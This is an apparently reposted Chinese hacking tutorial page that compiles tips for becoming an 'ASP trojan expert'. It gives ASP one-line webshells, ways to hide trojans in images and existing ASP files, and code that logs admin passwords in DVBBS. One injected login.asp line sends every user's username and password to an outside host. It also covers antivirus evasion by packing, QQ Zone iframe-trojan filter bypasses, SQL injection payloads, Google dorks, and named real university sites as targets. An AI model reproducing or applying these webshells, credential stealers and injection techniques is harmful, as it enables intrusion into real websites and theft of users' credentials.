让你变成ASP木马高手
让你变成ASP木马高手
发布时间:2016-12-26 来源:查字典编辑
摘要:1.名称:如何制作图片ASP木马(可显示图片)建一个asp文件,内容为找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ul...

1.名称:如何制作图片ASP木马(可显示图片)

建一个asp文件,内容为<>

找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为

了运行成功,还要搜索<%和%>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入

<SCRIPTRUNAT=SERVERLANGUAGE=JAVASCRIPT>eval(Request.form(#)+)</SCRIPT>

2.名称:整蛊网吧

先用精锐网吧辅助工具得到用户名和密码,然后用计算机管理联结一台机器,开telnet,连接,开共享,

复制一个木马过去运行即可。

3.名称:感受MD5暴力破解的魅力

rainbowcrack用法先用rtgen生成库"rtgenmd5byte175240040000all"

1和7代表密码最小和最大长度

阿汀我再加个方法:http://md5.rednoize.com/在线破解

或者到http://www.md5lookup.com/?category=01-3&;searck=on

4.很多时候我们做免杀木马,不用懂汇编,用北斗加壳程序就能逃杀,还有很多加壳软件,大家木马加壳

的时候最好多选择不知名的加壳软件

5.名称:隐蔽的插入型ASP木马

(1)在我们要做手脚的asp文件里加入如下内容

<%ifrequest("action")="ok"then%>

shell代码插在这里,最好是小马,还要加密一下

<%endif%>

访问的时候在你作手脚的asp文件后面加上?action=ok,即可

(2)另一种方法,在我们要做手脚的asp文件里加入如下内容

<%

onerrorresumenext

strFileName=Request.QueryString("filer")

setobjStream=Server.createObject("ABODB.Stream")

objStream.Type=1

objStream.Open

objStream.LoadFromFilestrFileName

objStream.SaveToFileServer.mappath("ating.asp"),2

%>

访问的时候在做手脚的asp文件后面加上?filer=XXX

XXX为你本地上传的一个路径如c:ating123.asp

上传后在做手脚的asp的同文件夹中有ating,asp

(3)前提得到system权限,

进入网站目录下一层

mkdirs…

copyating.asps…/

这样杀毒软件找不到的

访问http://网站/s…/ating.asp即可

6.工具http://hack520.tengyi.cn/chaojiyonghu.rar,此工具在该电脑生成一个超级用户用户名为:

hack密码110,在DOS下和计算机管理器上看不到你建立的用户,并且是删除不掉的

7.名称:QQ群脚本攻击

打开qq对话诓,复制消息,然后

下面的内容保存为.vbs文件,运行即可

SetWshShell=WScript.createobject("WScript.Shell")

WshShell.AppActivate"QQ信息攻击脚本"

fori=1to20

WScript.Sleep1000

WshShell.SendKeys"^v"

WshShell.SendKeysi

WshShell.SendKeys"%s"

Next

8.搜索:程序制作:万鹏有免费申请空间的,直接上传asp马即可

9.名称:全面找出你站上的ASP木马

(1)用杀毒软件

(2)用FTP客户端软件,点"工具"->"比较文件夹"

(3)用asplist2.0.asp上传到站点空间查看,一般功能多的ASP我估计就是ASP木马

(4)用工具BeyondCompare

10名称:拓展思路拿DVBBS帐号"一个人的圣经"的动画

(1)以前获得webshell后想进入DVBBS的后台,想要管理员的密码,可以这样

老办法:

修改admin_login.asp得到明文DVBBS后台密码

在"username=trim(replace(request("username")这行后面

DimfsoObject

DimtsObject

SetfsoObject=Server.createObject("Scripting.FileSystemObject")

settsObject=fsoObject.createTextFile(Server.MapPath("laner.txt"))

tsObject.WriteCStr(request("password"))

SetfsoObject=Nothing

SettsObject=Nothing

只要管理员登陆后台,在目录下就生成了laner.txt

(2)login.asp中Case"login_chk"下:

onerrorresumenext

Dimrain

setrain=server.createobject("adodb.stream")

rain.Type=2

rain.CharSet="gb2312"

rain.Position=rain.Size

rain.Open

rain.LoadFromFileserver.MapPath("laner.asp")

rain.writetextnow&request("username")&"text:"&request("password")&chr(10)

rain.SaveToFileserver.MapPath("laner.asp"),2

rain.Close

setrain=nothing

这样laner.asp将获得全部登陆人的登陆时间,用户名和密码

(3)如果你有自己的网站或者另外的webshell(强烈建议使用):

可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp:

<%ifrequest("n")<>""andrequest("p")<>""then

onerrorresumenext

Dimrain

setrain=server.createobject("adodb.stream")

rain.Type=2

rain.CharSet="gb2312"

rain.Position=rain.Size

rain.Open

rain.LoadFromFileserver.MapPath("laner.asp")

rain.writetextnow&"Name:"&request("n")&"Password:"&request("p")&chr(10)

rain.SaveToFileserver.MapPath("laner.asp"),2

rain.Close

setrain=nothing

endif%>

11.名称:利用QQ在线状态抓鸽子肉鸡

生成qq在线状态,把里面的地址改成木马地址,发到论坛

在login.asp那里插入一句:

response.write"<scriptsrc=http://www.ptlushi.com/laner/rain.asp?n="&request("username")

&""&"&p="&request("password")&"></script>"

response.write"<iframesrc=http://yourwebsite/laner/rain.asp?n="&request("username")

&""&"&p="&request("password")&"></iframe>"

结果所有登陆人都会乖乖的把名字和密码送到你的laner.asp里

12.动画名称:媒体中国整站程序存在多处漏洞

漏洞程序:媒体中国整站程序(第一版)

官方网站:http://meiti.elgod.com/

漏洞:%5c(暴库)上传注入

上传页面:down1/upload.asp

13.名称:免费电话+MSH命令行工具

http://www.globe7.com/打开主页,点击坐下角,FreeDownLoad,下载到本地,安装,

运行后,会提示正在寻找你所在地区的区号。由于是国际长途,注册一个帐号,送100美分,国内计时

0.01/分,你就有100分钟可以白打。是一个帐号哦。

要注意的就是,固定电话,小灵通形式为0086521123456521本来时0521,要省略前面的零,手机号也

是一样。

14.名称:Bo-Blog的新漏洞

http://网址/index.php?job=../admin/ban

把其中"禁止搜索的词"那部分<table>另存出来,里面的地址改完整,插入一句话木马

15.名称:钩魂者入侵传奇私服

用百度搜索传奇inurl:tuku

或者传奇inurl:wplm.htm

再或者传奇inurl:coolsites.asp

友情链接里插入一句话木马即可

16.程序:宏达企业整站上传漏洞

官方主页:http://www.mu126.com/

漏洞页面:/cx/upfile.asp(上传漏洞)

17.无间盗邮箱,在修改密码里,用户名和密码里添or=or

18.名称:bbsxp5.16后台得到webshell

bbsxp5.16过滤了asp,asp,cdx,cer,扩展名的文件上传,就是在基本设置上添加上上传类型也不行,并禁

止了修改数据备份数据名称,我们可以把此网页保存在本地,改源代码上传。

19.名称:JHACKJ2005年最新精典教程

下载看看吧,不错,各大网站都有

20.名称:省力入侵韩国肉鸡

在啊D的扫描注入点项,打开这个:http://www.google.co.kr/advanced_search?hl=zh-CN

这是高级搜索项,关键字随便写。这里我写asp?name=设置为每页显示100条。

语种选择韩文。搜索,很多sa.

21.名称:任何网吧的管理系统破解

选智能ABC,然后vv输入,光标后退两步,按delete键刚输入的两个vv删除

最后按Inter键

22.名称:破解QQ空间插入网页木马的代码

现在腾讯已经封了很多QQ空间代码了就如以前<iframesrc="木马地址"name="lcx"width="0"

height="0"frameborder="0"></iframe>插入网页木马的代码也早被封了

突破禁用的方法代码如下:

<divid=DI><imgsrc="javascript:DI.innerHTML=<iframesrc=木马地址width=190height=190

marginwidth=0marginheight=0hspace=0vspace=0frameborder=0scrolling=no></iframe>"

style=display:none></div>

最后附上卡拉是条ok总结的

1.上传漏洞[不多讲]

pS:如果看到:选择你要上传的文件[重新上传]或者出现"请登陆后使用",80%就有漏洞了!

有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.

2.注入漏洞[不多讲]

pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:

http://注入网址;updateadminsetpassword=新MD5密码wherepassword=旧MD5密码--

[admin为表名.]

3.旁注,也就是跨站.

我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个

站点用提权,嗅探等方法来入侵我们要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经

过加密,这就看我们的本事了

4.暴库:把二级目录中间的/换成%5c

EY:http://www.ahttc.edu.cn/otherweb/dz/bgs/BigClass.asp?BigClassName=职责范围&BigClassType=1

如果你能看到:E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa不是一个有效的路径。确定路

径名称拼写是否正确,以及是否连接到文件存放的服务器。

这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.

5.or=or这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:

or="or"a"="a)or(a=a")or("a"="aor1=1--ora=a

6.社会工程学。这个我们都知道吧。就是猜解。

EY:http://www.neu.edu.cn/waishi/admin

adminwaishi

7.写入ASP格式数据库。就是一句话木马[<%executerequest("value")%>],常用在留言本.

EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[这个就是ASP格式的数据库],再写入一句话

木马

8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.

EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp

这个站用的是:杰出校友录,源码我下过了,

默认数据库/webshell路径:databaseliangu_data.mdb后台管理:adm_login.asp密码及用户名都是

admin

9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.

/Databackup/dvbbs7.MDB

/bbs/Databackup/dvbbs7.MDB

/bbs/Data/dvbbs7.MDB

/data/dvbbs7.mdb

/bbs/diy.asp

/diy.asp

/bbs/cmd.asp

/bbs/cmd.exe

/bbs/s-u.exe

/bbs/servu.exe

工具:网站猎手挖掘鸡

EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB

10.查看目录法:人一些网站可以断开目录,可以方问目录。

EY:http://www.ujs168.com/shop/admin/

http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/

这样我们可以找到数据库,下载不用我教吧

11.工具溢出:.asp?NewsID=/2j.asp?id=18.asp?id=[这种方法可以取得大量的WEBSHELL]

12.搜索引擎利用:

(1).inurl:flasher_list.asp默认数据库:database/flash.mdb后台/manager/

(2).找网站的管理后台地址:

site:xxxx.comintext:管理

site:xxxx.comintitle:管理<关键字很多,自已找>

site:xxxx.cominurl:login

(3).查找access的数据库,mssql、mysql的连接文件

allinurl:bbsdata

filetype:mdbinurl:database

filetype:incconn

inurl:datafiletype:mdb

我主不做了。。自已做做吧。。

13.COOKIE欺骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。

这个我就不多讲了

14.利用常见的漏洞:如动网BBS

EY:http://js1011.com/bbs/index.asp

可以先用:dvbbs权限提升工具,使自已成为前台管理员。

THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert

取得Cookies/NC包

这个我就不做了,网上教程多的是,自已下个看看。

工具:dvbbs权限提升工具动网固顶贴工具

15.还有一些老漏洞。如IIS3,4的查看源码,5的delete

CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新安全教程学习
热门安全教程学习
实用技巧子分类